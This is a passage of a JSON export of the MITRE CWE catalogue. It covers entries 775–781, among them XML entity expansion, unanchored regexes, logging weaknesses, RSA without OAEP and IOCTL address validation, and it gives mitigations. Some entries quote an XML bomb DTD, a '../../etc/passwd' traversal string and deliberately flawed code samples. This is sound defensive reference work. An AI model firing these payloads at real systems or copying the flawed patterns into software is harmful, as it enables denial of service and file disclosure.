Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Alternate_Terms, Relationships, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"775":{"attr":{"@_ID":"775","@_Name":"Missing Release of File Descriptor or Handle after Effective Lifetime","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not release a file descriptor or handle after its effective lifetime has ended, i.e., after the file descriptor/handle is no longer needed.","Extended_Description":"When a file descriptor or handle is not released after use (typically by explicitly closing it), attackers can cause a denial of service by consuming all available file descriptors/handles, or otherwise preventing other system processes from obtaining their own file descriptors/handles.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"772","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"An attacker that can influence the allocation of resources that are not properly released could deplete the available resource pool and prevent all other processes from accessing the same type of resource."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-47"},"Phase":["Operation","Architecture and Design"],"Strategy":"Resource Limitation","Description":{"xhtml:p":["Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems.","When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users.","Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703)."]}}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2007-0897","Description":"Chain: anti-virus product encounters a malformed file but returns from a function without closing a file descriptor (CWE-775) leading to file descriptor consumption (CWE-400) and failed scans.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0897"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO42-C","Entry_Name":"Close files when they are no longer needed","Mapping_Fit":"CWE More Abstract"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 10, "File Descriptor Leaks", Page 582"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, Relationships, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"776":{"attr":{"@_ID":"776","@_Name":"Improper Restriction of Recursive Entity References in DTDs (\'XML Entity Expansion\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses XML documents and allows their structure to be defined with a Document Type Definition (DTD), but it does not properly control the number of recursive definitions of entities.","Extended_Description":"If the DTD contains a large number of nested or recursive entities, this can lead to explosive growth of data when parsed, causing a denial of service.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"674","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"674","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"409","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"XML","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"XEE","Description":"XEE is the acronym commonly used for XML Entity Expansion."},{"Term":"Billion Laughs Attack"},{"Term":"XML Bomb","Description":"While the \\"XML Bomb\\" term was used in the early years of knowledge of this issue, the XEE term seems to be more commonly used."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"If parsed, recursive entity references allow the attacker to expand data exponentially, quickly consuming all system resources."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Operation","Description":"If possible, prohibit the use of DTDs or use an XML parser that limits the expansion of recursive DTD entities."},{"Phase":"Implementation","Description":"Before parsing XML files with associated DTDs, scan for recursive entity declarations and do not continue parsing potentially explosive content."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-53"},"Intro_Text":"The DTD and the very brief XML below illustrate what is meant by an XML bomb. The ZERO entity contains one character, the letter A. The choice of entity name ZERO is being used to indicate length equivalent to that exponent on two, that is, the length of ZERO is 2^0. Similarly, ONE refers to ZERO twice, therefore the XML parser will expand ONE to a length of 2, or 2^1. Ultimately, we reach entity THIRTYTWO, which will expand to 2^32 characters in length, or 4 GB, probably consuming far more data than expected.","Example_Code":{"attr":{"@_Nature":"attack","@_Language":"XML"},"xhtml:div":{"#text":"<?xml version=\\"1.0\\"?><!DOCTYPE MaliciousDTD [<!ENTITY ZERO \\"A\\"><!ENTITY ONE \\"&ZERO;&ZERO;\\"><!ENTITY TWO \\"&ONE;&ONE;\\">...<!ENTITY THIRTYTWO \\"&THIRTYONE;&THIRTYONE;\\">]><data>&THIRTYTWO;</data>","xhtml:br":["","","","","","","",""]}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-3281","Description":"XEE in XML-parsing library.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3281"},{"Reference":"CVE-2011-3288","Description":"XML bomb / XEE in enterprise communication product.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3288"},{"Reference":"CVE-2011-1755","Description":"\\"Billion laughs\\" attack in XMPP server daemon.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1755"},{"Reference":"CVE-2009-1955","Description":"XML bomb in web server module","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1955"},{"Reference":"CVE-2003-1564","Description":"Parsing library allows XML bomb","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1564"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":44,"Entry_Name":"XML Entity Expansion"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-676"}},{"attr":{"@_External_Reference_ID":"REF-677"}},{"attr":{"@_External_Reference_ID":"REF-678"}},{"attr":{"@_External_Reference_ID":"REF-679"}},{"attr":{"@_External_Reference_ID":"REF-680"}},{"attr":{"@_External_Reference_ID":"REF-500"}},{"attr":{"@_External_Reference_ID":"REF-682"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-06-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Description, Name, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":{"#text":"Unrestricted Recursive Entity References in DTDs (\'XML Bomb\')","attr":{"@_Date":"2013-02-21"}}}},"777":{"attr":{"@_ID":"777","@_Name":"Regular Expression without Anchors","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a regular expression to perform neutralization, but the regular expression is not anchored and may allow malicious or malformed data to slip through.","Extended_Description":"When performing tasks such as validating against a set of allowed inputs (allowlist), data is examined and possibly modified to ensure that it is well-formed and adheres to a list of safe values. If the regular expression is not anchored, malicious or malformed data may be included before or after any string matching the regular expression. The type of malicious data that is allowed will depend on the context of the application and which anchors are omitted from the regular expression.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"625","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Background_Details":{"Background_Detail":"Regular expressions are typically used to match a pattern of text. Anchors are used in regular expressions to specify where the pattern should match: at the beginning, the end, or both (the whole input)."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Availability","Confidentiality","Access Control"],"Impact":"Bypass Protection Mechanism","Note":"An unanchored regular expression in the context of an allowlist will possibly result in a protection mechanism failure, allowing malicious or malformed data to enter trusted regions of the program. The specific consequences will depend on what functionality the allowlist was protecting."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Be sure to understand both what will be matched and what will not be matched by a regular expression. Anchoring the ends of the expression will allow the programmer to define an allowlist strictly limited to what is matched by the text in the regular expression. If you are using a package that only matches one line by default, ensure that you can match multi-line inputs if necessary."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider a web application that supports multiple languages. It selects messages for an appropriate language by using the lang parameter.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$dir = \\"/home/cwe/languages\\";$lang = $_GET[\'lang\'];if (preg_match(\\"/[A-Za-z0-9]+/\\", $lang)) {}else {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"include(\\"$dir/$lang\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo \\"You shall not pass!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../etc/passwd"}],"Body_Text":["The previous code attempts to match only alphanumeric values so that language values such as \\"english\\" and \\"french\\" are valid while also protecting against path traversal, CWE-22. However, the regular expression anchors are omitted, so any text containing at least one alphanumeric character will now pass the validation step. For example, the attack string below will match the regular expression.","If the attacker can inject code sequences into a file, such as the web server\'s HTTP request log, then the attacker may be able to redirect the lang parameter to the log file and execute arbitrary code."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-06-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences, Description, Potential_Mitigations"}]}},"778":{"attr":{"@_ID":"778","@_Name":"Insufficient Logging","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"When a security-critical event occurs, the software either does not record the event or omits important details about the event when logging it.","Extended_Description":"When security-critical events are not logged properly, such as a failed login attempt, this can make malicious behavior more difficult to detect and may hinder forensic analysis after an attack succeeds.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"223","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"If security critical information is not recorded, there will be no trail for forensic analysis and discovering the cause of problems or the source of attacks may become more difficult or impossible."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use a centralized logging mechanism that supports multiple levels of detail. Ensure that all security-related successes and failures can be logged."},{"Phase":"Operation","Description":"Be sure to set the level of logging appropriately in a production environment. Sufficient data should be logged to enable system administrators to detect attacks, diagnose errors, and recover from attacks. At the same time, logging too much data (CWE-779) can cause the same problems."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The example below shows a configuration for the service security audit feature in the Windows Communication Foundation (WCF).","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"<system.serviceModel></system.serviceModel>","xhtml:div":{"#text":"<behaviors>","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<serviceBehaviors>","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<behavior name=\\"NewBehavior\\">...","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<serviceSecurityAudit auditLogLocation=\\"Default\\"suppressAuditFailure=\\"false\\"serviceAuthorizationAuditLevel=\\"None\\"messageAuthenticationAuditLevel=\\"None\\" />","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},"xhtml:br":["",""]}}}}},{"attr":{"@_Nature":"good","@_Language":"XML"},"xhtml:div":{"#text":"<system.serviceModel></system.serviceModel>","xhtml:div":{"#text":"<behaviors>","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<serviceBehaviors>","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<behavior name=\\"NewBehavior\\">...","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<serviceSecurityAudit auditLogLocation=\\"Default\\"suppressAuditFailure=\\"false\\"serviceAuthorizationAuditLevel=\\"SuccessAndFailure\\"messageAuthenticationAuditLevel=\\"SuccessAndFailure\\" />","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},"xhtml:br":["",""]}}}}}],"Body_Text":["The previous configuration file has effectively disabled the recording of security-critical events, which would force the administrator to look to other sources during debug or recovery efforts.","Logging failed authentication attempts can warn administrators of potential brute force attacks. Similarly, logging successful authentication events can provide a useful audit trail when a legitimate account is compromised. The following configuration shows appropriate settings, assuming that the site does not have excessive traffic, which could fill the logs if there are a large number of success or failure events (CWE-779)."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-4315","Description":"server does not log failed authentication attempts, making it easier for attackers to perform brute force password guessing without being detected","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4315"},{"Reference":"CVE-2008-1203","Description":"admin interface does not log failed authentication attempts, making it easier for attackers to perform brute force password guessing without being detected","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1203"},{"Reference":"CVE-2007-3730","Description":"default configuration for POP server does not log source IP or username for login attempts","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3730"},{"Reference":"CVE-2007-1225","Description":"proxy does not log requests without \\"http://\\" in the URL, allowing web surfers to access restricted web content without detection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1225"},{"Reference":"CVE-2003-1566","Description":"web server does not log requests for a non-standard request type","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1566"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, "Accountability", Page 40"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-07-02"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Organization":"Fortify Software","Contribution_Date":"2009-07-02","Contribution_Comment":"Provided code example and additional information for description and consequences."}}},"779":{"attr":{"@_ID":"779","@_Name":"Logging of Excessive Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software logs too much information, making log files hard to process and possibly hindering recovery efforts or forensic analysis after an attack.","Extended_Description":"While logging is a good practice in general, and very high levels of logging are appropriate for debugging stages of development, too much logging in a production environment might hinder a system administrator\'s ability to detect anomalous conditions. This can provide cover for an attacker while attempting to penetrate a system, clutter the audit trail for forensic analysis, or make it more difficult to debug problems in a production environment.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"400","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Other)"],"Note":"Log files can become so large that they consume excessive resources, such as disk and CPU, which can hinder the performance of the system."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"Logging too much information can make the log files of less use to forensics analysts and developers when trying to diagnose a problem or recover from an attack."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"If system administrators are unable to effectively process log files, attempted attacks may go undetected, possibly leading to eventual system compromise."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Suppress large numbers of duplicate log messages and replace them with periodic summaries. For example, syslog may include an entry that states \\"last message repeated X times\\" when recording repeated events."},{"Phase":"Architecture and Design","Description":"Support a maximum size for the log file that can be controlled by the administrator. If the maximum size is reached, the admin should be notified. Also, consider reducing functionality of the software. This may result in a denial-of-service to legitimate software users, but it will prevent the software from adversely impacting the entire system."},{"Phase":"Implementation","Description":"Adjust configurations appropriately when software is transitioned from a debug state to production."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-0421","Description":"server records a large amount of data to the server log when it receives malformed headers","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0421"},{"Reference":"CVE-2002-1154","Description":"chain: application does not restrict access to front-end for updates, which allows attacker to fill the error log","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1154"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-07-02"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"780":{"attr":{"@_ID":"780","@_Name":"Use of RSA Algorithm without OAEP","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses the RSA algorithm but does not incorporate Optimal Asymmetric Encryption Padding (OAEP), which might weaken the encryption.","Extended_Description":"Padding schemes are often used with cryptographic algorithms to make the plaintext less predictable and complicate attack efforts. The OAEP scheme is often used with RSA to nullify the impact of predictable common text.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"327","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"Without OAEP in RSA encryption, it will take less work for an attacker to decrypt the data or to infer patterns from the ciphertext."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The example below attempts to build an RSA cipher.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public Cipher getRSACipher() {}","xhtml:div":{"#text":"Cipher rsa = null;try {}catch (java.security.NoSuchAlgorithmException e) {}catch (javax.crypto.NoSuchPaddingException e) {}return rsa;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"rsa = javax.crypto.Cipher.getInstance(\\"RSA/NONE/NoPadding\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"log(\\"this should never happen\\", e);","attr":{"@_style":"margin-left:10px;"}},{"#text":"log(\\"this should never happen\\", e);","attr":{"@_style":"margin-left:10px;"}}]}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public Cipher getRSACipher() {}","xhtml:div":{"#text":"Cipher rsa = null;try {}catch (java.security.NoSuchAlgorithmException e) {}catch (javax.crypto.NoSuchPaddingException e) {}return rsa;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"rsa = javax.crypto.Cipher.getInstance(\\"RSA/ECB/OAEPWithMD5AndMGF1Padding\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"log(\\"this should never happen\\", e);","attr":{"@_style":"margin-left:10px;"}},{"#text":"log(\\"this should never happen\\", e);","attr":{"@_style":"margin-left:10px;"}}]}}}],"Body_Text":"While the previous code successfully creates an RSA cipher, the cipher does not use padding. The following code creates an RSA cipher using OAEP."}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-694"}},{"attr":{"@_External_Reference_ID":"REF-695"}}]},"Notes":{"Note":{"#text":"This entry could probably have a new parent related to improper padding, however the role of padding in cryptographic algorithms can vary, such as hiding the length of the plaintext and providing additional random bits for the cipher. In general, cryptographic problems in CWE are not well organized and further research is needed.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Organization":"Fortify Software","Submission_Date":"2009-07-08","Submission_Comment":"Based on information from Fortify Software."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"781":{"attr":{"@_ID":"781","@_Name":"Improper Address Validation in IOCTL with METHOD_NEITHER I/O Control Code","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software defines an IOCTL that uses METHOD_NEITHER for I/O, but it does not validate or incorrectly validates the addresses that are provided.","Extended_Description":"When an IOCTL uses the METHOD_NEITHER option for I/O control, it is the responsibility of the IOCTL to validate the addresses that have been supplied to it. If validation is missing or incorrect, attackers can supply arbitrary memory addresses, leading to code execution or a denial of service.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1285","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"822","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}}],"Operating_System":{"attr":{"@_Name":"Windows NT","@_Prevalence":"Sometimes"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality"],"Impact":["Modify Memory","Read Memory","Execute Unauthorized Code or Commands","DoS: Crash, Exit, or Restart"],"Note":"An attacker may be able to access memory that belongs to another process or user. If the attacker can control the contents that the IOCTL writes, it may lead to code execution at high privilege levels. At the least, a crash can occur."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"If METHOD_NEITHER is required for the IOCTL, then ensure that all user-space addresses are properly validated before they are first accessed. The ProbeForRead and ProbeForWrite routines are available for this task. Also properly protect and manage the user-supplied buffers, since the I/O Manager does not do this when METHOD_NEITHER is being used. See References."},{"Phase":"Architecture and Design","Description":"If possible, avoid using METHOD_NEITHER in the IOCTL and select methods that effectively control the buffer size, such as METHOD_BUFFERED, METHOD_IN_DIRECT, or METHOD_OUT_DIRECT."},{"Phase":["Architecture and Design","Implementation"],"Description":"If the IOCTL is part of a driver that is only intended to be accessed by trusted users, then use proper access control for the associated device or device namespace. See References."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-2373","Description":"Driver for file-sharing and messaging protocol allows attackers to execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2373"},{"Reference":"CVE-2009-0686","Description":"Anti-virus product does not validate addresses, allowing attackers to gain SYSTEM privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0686"},{"Reference":"CVE-2009-0824","Description":"DVD software allows attackers to cause a crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0824"},{"Reference":"CVE-2008-5724","Description":"Personal firewall allows attackers to gain SYSTEM privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5724"},{"Reference":"CVE-2007-5756","Description":"chain: device driver for packet-capturing software allows access to an unintended IOCTL with resultant array index error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5756"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-696"}},{"attr":{"@_External_Reference_ID":"REF-697"}},{"attr":{"@_External_Reference_ID":"REF-698"}},{"attr":{"@_External_Reference_ID":"REF-699"}},{"attr":{"@_External_Reference_ID":"REF-700"}},{"attr":{"@_External_Reference_ID":"REF-701"}},{"attr":{"@_External_Reference_ID":"REF-702"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"Because IOCTL functionality is typically performing low-level actions and closely interacts with the operating system, this weakness may only appear in code that is written in low-level languages."},{"attr":{"@_Type":"Research Gap"},"xhtml:p":["While this type of issue has been known since 2006, it is probably still under-studied and under-reported. Most of the focus has been on high-profile software and security products, but other kinds of system software also use drivers. Since exploitation requires the development of custom code, it requires some skill to find this weakness.","Because exploitation typically requires local 